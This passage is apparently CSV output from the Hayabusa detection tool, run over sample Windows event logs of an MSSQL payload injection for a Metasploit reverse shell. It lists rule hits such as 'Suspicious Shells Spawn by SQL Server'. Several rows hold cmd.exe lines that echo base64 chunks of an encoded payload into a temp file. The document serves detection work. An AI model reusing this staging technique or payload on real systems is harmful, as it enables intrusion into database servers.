(MSF).evtx +2020-08-01 22:58:16.295 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL 
Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:16.295 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:16.297 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:16.568 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb3c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:16.568 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:16.568 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in 
CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:16.570 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:16.841 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xa98 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:16.841 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:16.841 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:16.843 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy 
Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:17.115 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo pHyqCv8klYB8QNqLA41N/ElsBI1VrFFSanhqBFDoWgyocxrEd4vwxoEXIOmb/s//iwODw3CFwA+EwADpAMxN/I1VrFFSUOhRCQAAi/CLReQptQyFwA+ErgAAAItF8ItN7jvBD7OgKQAAiUX8xkUXIOlW/v//iwODkMeFwHR/jU0tjThqUVtQ6IAIAADrvYvhg8MEhcB074sQxI2s/f//aP8eAABRUughDQA+oPCDyf+m/jNA5wVy0UnGRRcgiU1l6eX+Nv+LmIPDBIWddC+NTfyN1axgUlDoUJEAAOlqUf//IAN7wwScwHQTjQb8jVWs+VJQ6FTdAPnpTv///76gwkAAx0X8uQAAAMZwFyDphv3//4OWBDxCdQuLQwKFwHSs09+0bzwOdfGLS/yFyWgHd7RcSQTrBPTA9smNVdJSpFC+52f//4vwg8n/i/5HwPKu99FJxkUXIIns/Ols/f9J/kj0QABu7w0IAAAAxkX7AIMC4+lU/f+uxkUjsoj964116n1F5wIAXgDGjnZN6Qrm//+LfWaLRfSFwHTxO0XcchlXiXL/HkJExASQwA+F/gAAAItPBMgHiU1WilUXiBAPiUX0i03si1X8QejS7BBNckkvyp1Ng3fAixn26fgBiyv0dUoGJvyF/5RDhcB0NDvpRXInfUUIi00nUIkIIVUIg8QEhcB0hdUVAACLRQyLEItABIlF3IlV9C0Zig6ICIdLRfSLTTxBRk+JTex1vYtNioXJdFiLTcCFyZhRi1Xgi038O9GVR4XAdB+8RdxyIIt9DItFiVeJB/9VCIPEBIXAdU+LD01XBIlN9IlV3IvBik0uiBJAiUUBiz/zi1X86+FN7LFN4Ek7yolN4He5/0UQ7VUQinCECw+FXPX//4tNDHVF9F+JAYtF7F5bi+VdwhAAX16DyP9bi+VdwhAAkKJ7QAB9eHoAlXZAAE93QACNAUAAYnhABlR0QACUeEAA7+lAuft4QAA9dkAA6HNAANh6QAAAfQwMIAzGDAwMDAwMDAwMDBcMDAwMDAwM8Aw8DHkMDAzNyQwMAYQMuFUM4AwMDAwMDAxRDAyMDAxqkQyhDAwMDCMM/VoCDAMMDAwMDAwMDAwMDD0MDAwMBAwM/QwMDAwMDAwFBmYCSQwGDAwMDAcICQwMCgwLDAy2jUkAontAAIl5QN4mekAARHlAANl5QJGieUAAjHmDAPV5QABzekAAAAgICAiHMwjgCAgIOQgICAgICAgZCAgICAgICAgICAg/wggICAgIHggkCAjj6ggIR+4nCAgICHUICAgICAhjCAgBAggICAIhCOoICAh9CAgICC0CBAgICAgIQlKnCAgICAgICAgICGwICAgICAXwCAYICQh5kJCQkJCQkFWL7IPsWFbORX1XS30QjU38UItFDI1VBlGLTQhSWFB66CMBAACaTYSLORSDxBiJR/iFyYuddAbGAnLmcgFQT/9Ts8l+D4A8>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb24 | User: Svc-SQL-DB01 | LID: 
0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:17.115 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:17.115 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:17.117 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:17.389 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x43c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:17.389 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn 
by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:17.389 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:17.391 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:17.664 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
DXzUJz5zB7kBAAAA65kzs4vNFIUFifR0B/fbg9AA99hWagBqClB26KQ2AO5YyIvyisGyCvbqKncEgMMwi8bcH4vZjj502+BFxYtNHG3HXokBi8dfW13DkN+QsiKQjJDXkJCQkNOQVYvsUYtFCFOHiwhR/xWwwRMAi3UMi9j9VQiNRQxSi8tWUEzh/yEAAGoBUYld/Ojh/v//SI1VCFJQxgAKjUUMM8mbis9qAVHohP7//0iNVQhSUMYAhI1FDDPJUIpNimoBUQSa/hH/SExVCFJQxgAujUUMjhgBwesYU+ge/lX/i00Qg8RQtvCJ8F5bi+W8w5CQVYvsg+xWU1aNRfy5i9apUIupCI1N+DPSV2YkUAxRagFS6Br+/4eZ2ItFCIPEFEsUyJD+///GCsOLSLlgRXjolOr//5LAbzmLHhBLK/uLw8ZqP4k6X15bi+Xzw0T+g8nZzv/yrvfRSSvZi8ET+8HpAoalpguLGgyD4QMrw8iki2UQX16JAYvDW3blXcOQkJCQVTrsnps8i4QIi1UMUYsAVk0IUlFqAVDof/3//yLEFD3DkAtqkJCQIJCQkJCQkJCQVYvsgxNcXCwIUwyLdSBXiyP0PGZ1HItNHI1FpFCLRRCNVRhRDk0MUleCUVjAAQAA63aLRRyNNqRSjU0YUItCbI20C1GLTQxSUFEJAfv/OosVl8FVAIvYg1wHPDoBfhUzwGgDFeEAigNQ/xV4wUAAg8QIhRV6FXjBQAAzG4oLiwJmi2BIJQMBAEaFwPKei/uDyf8zwIpVJPKui0Ugi/P40UmL+IkKQYvRwekC56WLyoPhYPOk2j8cX15bwgEAAAAAi+Vdw4pVo4D+LXVskUUYhcDeQYt1IMYGMEaF/35NjAYuK4XAfRf32EzIiUUci7EiMA4wMIv+wekCGLOlyk3JA/OqFEUYi8qKaC8D8QPBQIlFGOs/SEaJRRiKC+dOakOFwH/xSIX/iewYfwSLiySFyXa4xlsuRgsbi3Xjiq+IBkYShf9/v4tFFIWfdATGBi5Gi0WaXQuEyXQLiA6KSwFGQ4TWdfWA+mZ0aNcfRl6JGRh0U425HI1VgVGNTQhSLWoUW+j6+///iwanocQUi02HhdsPlcJGg/nfjYQSK4i4C3U2xgYwRgXmhcl0QYoQiBZGQAx199FFIItN5CtLX4k8+1sW5YvDxgYrRsYGMHTG4jBGi0Ugi00kK/Bfia1IHFvlXcOQkJCQeJCQkJACkJBqkFXG7ItFHItNyZ5VFFqLRZVqAFGLTQxSi1UIUFFS6G75//+D5hxdw7CQ5ZCQXZCo7FWLI1NWV4B9DL4BAAAAIM+LRRpMvMJAwdPmik2TToACWHQFuyERQACLVQiLzkgjyooMGYiyi3DT6oXSdUeLTRSLVRhSbF9eqgr8XUGQkJCQVcPsi00QU+fJRRR1v78AAACLdRi75MJAANPnTzxYdPC70MJAAItVDItFCKvS>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb54 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:17.664 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL 
Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:17.664 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:17.667 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:17.939 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x3ec | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:17.939 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:17.939 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in 
CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:17.941 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:18.213 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb64 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:18.213 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:18.213 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:18.216 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy 
Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:18.488 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x3b8 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:18.488 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:18.488 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:18.490 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:18.764 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x9a0 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:18.764 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:18.764 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:18.766 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:19.038 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 
ADA9nMBAAItOFItGEIXJfBZ/BIXAdhBlAG3oXQAAUVDoBx4AAOsHnjGD+P91BAvAk7gz9CGLRgyLSNFR/2NZgAAAAHSAhcB0MaHsfUEAi97NhcB1/1Bo7ABBANMOhocAAIPEDKPsBUEAhcB0BVcp0OsINQH/FUzAQACLRkmL4aKNVfxqJFJQUf9TtMAg+oXAdAhfM32Si+VdMos1mMBAAP/WhcB10l9eM+VdiGvWBb31CgBfXrXlXcOQrZCQkJCQkJAnTZCQkFWL+W/kdQhWNxP7//8IxAQMwHUdiwZoQJNAAEpQ6P69//9nVFhr9nQGs+hRCyoAI8Be5MIEAJCQkJCQkM6QkJBVi+xTVot1EFeLfXUz24tNCI1F1FC3EIlKEOjRFQAAi00QA7Er8YXZhcBUBD79d96LUBSFyXQCOhlfXltdwisAVfrsTOw8oRUIQQBTM9LIE/gRV4lV+IlV9IkZ9H0Xi0UQEvAIUFEgEgYAAIPECB9eKIvlm9GLD6z3wWIAcwAPWywCAACL8TPbgeYAABFRiV38iDbsdArHRfzeAACIQ138i/mB5wAAIhp0s4PLAoldhoHhAABwfIlN6HQGg8sEiV38i0UUg4UCD4XhAH8Ai1UMagRo4AAJAGoy/QAVBMFAAIPEDIXAdS2LRQy7BABwWFODwG0ugAH8AFD/FQTNhUODxMPewHX3/k1LFrYAAAAXx0EMXABiTAZBAIVXdRl0aGgBQQBqAei2gwAAg/5NXEwGLACFwHQSi03ojVXs99lSjVXwG8nRACPK7ez4999RjU1Dlf8j+YtN/AHeGyRXI/KLfQxWUY0MWmoByf/Q6wpqAf9/TKdAADPACvsGIwmLVQwLlBsMQwAzyTvBD4WtAAAAi30IiwvsaCD9zABoa5xAAIsHUlDo97v//+mzNAAAg/gBdVcj+QZBADvCURxSaFABQRpqAegXDwAAg0AMo1AGQQCFwHRfi03ojVXsCdkvjVXT7D1qACPKoFX4999RCE30G/8j+YtNDPclG/ZXu/JWU2oBUf+w6ZH///8FLA+FkjcAAPZUBkEAp8J1vVIOQOlBM2oBLLgOAACDxAwZVAZBsoUQdaFqAWcVTMBIYohP3P8Xi30IiU1CiU30iU34OU3odGHFVRBS6Ogn1gAAXMTA61IWRfgzySzBdFqJR8WLRzkNAAABAC1HBItF9DvBdA6JRxSLRwQNANYC84lHD4xF8GrBzWOLtxBQrVfogT4AAIPEDOsPX164eBEBAFtP5V3Di30Ig57cCEEAMg+M7gEAAD5FELsAAgAAhUsPhAsBAACDOgwBD25pATmQi3UUhfam0V50BokAhcB1GVBoucNBaWoF6OkNAABNowyjdN1BAIVJVTtqBY1NxGogUYtNDNBV5JF3n9DHwA+LvgAAI4tF5IXAD9UgAAAAi/A3i1XEsUc0i+YEiVepC8PF0i0AAGoB/xVMwEAA69WLHUzA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x132c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:19.038 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL 
Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:19.038 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:19.040 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:19.311 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 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>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x1084 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:19.311 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:19.311 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in 
CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:19.313 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:19.583 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 